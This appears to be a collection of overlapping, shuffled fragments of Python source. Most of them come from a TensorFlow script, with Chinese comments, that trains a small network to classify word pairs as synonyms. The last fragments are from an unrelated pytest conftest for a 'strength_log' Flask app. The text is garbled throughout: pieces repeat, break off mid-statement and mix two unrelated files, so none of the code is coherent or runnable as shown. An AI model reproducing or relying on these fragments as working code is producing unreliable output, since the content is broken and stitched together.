tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))", "dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out *", "np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :]", "sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 -", "= tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in", "L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) #", "L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1,", "= 30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim,", "size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32,", "W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50 #", "#coding:UTF-8 #这个文件用tf实现一个单层神经网络,用来判断两个词是否是同义词 #输入是readerX产生的X@200 和Y@1 #划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import", "= tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op =", "sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0", "print inputSam xSam = xIn[randList, :] ySam = yIn[randList, :] # print ySam", "# b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out =", "tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32)", "loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or(", ":] ySam = yIn[randList, :] # print ySam # _, loss_val, W_val =", "sample_num = len(yIn) - 1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp)", "'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x =", "loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))})", "# feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss,", "= train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20", "= tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2',", "num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num),", "len(yIn) - 1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print", "data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt < 2000 and", "tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for", "print ySam # _, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num],", "# print ySam # _, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x:", "as tf import numpy as np import random import gc data_dim = 200#输入数据的维度", "loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope:", "= tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) #", "shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num =", "= tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in", "= [[i,1 - i] for i in yInTemp] print 'Reader Done' xIn =", "print W_val if accu > 0.99: print '#' * 20 print accu print", "dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) +", "'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000", "train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt", "with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary", "print accu print accu_test # print W_val if accu > 0.99: print '#'", "b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2',", "= len(yIn) - 1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect()", "tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in =", "#L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32)", "\"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with", "b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in)", "< 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))})", "xIn[randList, :] ySam = yIn[randList, :] # print ySam # _, loss_val, W_val", "cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x:", "scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\",", "2)}) if cnt%1000 == 0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!!", "inputSam = random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam = yIn[randList,", "accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1,", "== 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:],", "xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print", "del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim)) y", "# _, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y:", "for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) #", "feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3],", "_, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)})", "= tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer())", "cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print", "20 print 'cnt', cnt print loss_val print accu print accu_test # print W_val", "= tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out))", "* 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out,", "size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam", "feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt <", "piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for", "= tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out =", "50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss =", "2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#'", "x = tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None,", "1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared'", "+ b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2),", "'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num),", "accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' *", "W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32)", "train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session()", "= tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as", "num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1,", "xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for i in yInTemp]", "# print inputSam xSam = xIn[randList, :] ySam = yIn[randList, :] # print", "tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt =", "if cnt%1000 == 0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu", "Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print", "np import random import gc data_dim = 200#输入数据的维度 # piece = 999999 #", "num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out,", "rst = L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) #", "(None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2", "W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt", "'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1)", "= L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss", "loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if", "xSam = xIn[randList, :] ySam = yIn[randList, :] # print ySam # _,", "tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss)", "with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1',", "'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3", "tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2 = 20 print num,", "ySam # _, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], #", "= tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2 = 20 print", "= np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam = xIn[randList,", "tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2',", "# inputSam = random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam =", "y = tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2 = 20", "# rst = L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y)", "= tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in", "yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample size is :", "* 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for i", "print loss_val print accu print accu_test # print W_val if accu > 0.99:", "print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x", "'#' * 20 print 'cnt', cnt print loss_val print accu print accu_test #", "tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 =", "yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn)", "print '#' * 20 print 'cnt', cnt print loss_val print accu print accu_test", "[[i,1 - i] for i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp)", "inputSam xSam = xIn[randList, :] ySam = yIn[randList, :] # print ySam #", "np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample size is : ',sample_num del(yInTemp)", "= tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out", "= tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt", "dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in)", "import numpy as np import random import gc data_dim = 200#输入数据的维度 # piece", "num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x,", "# sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1", "cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1,", "yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y:", "tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\")", "shape = (None, 2)) num = 30 num2 = 20 print num, num2", "loss_val print accu print accu_test # print W_val if accu > 0.99: print", "= readerX.genAllXY() yInTemp = [[i,1 - i] for i in yInTemp] print 'Reader", "xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x:", "print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32,", "0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num],", "y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as", "2)) num = 30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1", "b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out", "or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y:", "print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) -", "tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in =", "'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2)", "= np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample size", "Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam =", "ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt < 2000 and cnt%100 ==", "= random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam = yIn[randList, :]", "* tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1),", "xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt < 2000", "print 'cnt', cnt print loss_val print accu print accu_test # print W_val if", "y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val", "tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2',", "tensorflow as tf import numpy as np import random import gc data_dim =", "tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess:", "200#输入数据的维度 # piece = 999999 # sample_num = piece * 49 xInTemp, yInTemp", "= sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val,", "# print W_val if accu > 0.99: print '#' * 20 print accu", "dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1',", "yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for i in yInTemp] print", "0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y:", "as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training", "b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 =", "# loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y", "accu > 0.99: print '#' * 20 print accu print accu_test print cnt", "dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out", "train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20 print", "randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam =", "= tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction,", "tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01)", "= 999999 # sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp", "tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in)", "gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim)) y =", "49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i] for i in", "'cnt', cnt print loss_val print accu print accu_test # print W_val if accu", "print W1_val print '#' * 20 print 'cnt', cnt print loss_val print accu", "print accu_test # print W_val if accu > 0.99: print '#' * 20", "Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50", "# y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1,", "W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _," ]
[ "SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True)", "ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the", "\"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED", "import create_app, db from strength_log.config import Config from helium import start_firefox, kill_browser, click,", "headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user():", "into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return", "User from strength_log import create_app, db from strength_log.config import Config from helium import", "= False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture", "= start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\")", "def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield", "@pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\")", "data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit", "write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS =", "test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client", "from strength_log.config import Config from helium import start_firefox, kill_browser, click, Link, write import", "app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and", "new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig)", "app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create", "db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db # Testing happpens here db.drop_all()", "user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client", "driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE,", "strength_log.models import User from strength_log import create_app, db from strength_log.config import Config from", "write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user =", "Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2)", "User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield", "# Create the database and tables db.create_all() # Insert user data user1 =", "def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app =", "class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED =", "def init_database(): # Create the database and tables db.create_all() # Insert user data", "init_database(): # Create the database and tables db.create_all() # Insert user data user1", "TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture", "= \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield", "driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver =", "Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS", "HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI =", "kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\")", "testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables db.create_all() #", "import Config from helium import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE", "db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\")", "<filename>tests/conftest.py<gh_stars>1-10 from strength_log.models import User from strength_log import create_app, db from strength_log.config import", "user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) #", "= User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db # Testing", "User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client()", "headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\",", "= create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\")", "yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\")", "click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user", "Config from helium import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE =", "the database and tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\")", "password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db", "from strength_log.models import User from strength_log import create_app, db from strength_log.config import Config", "start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\"))", "return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx =", "True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home():", "tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\",", "from helium 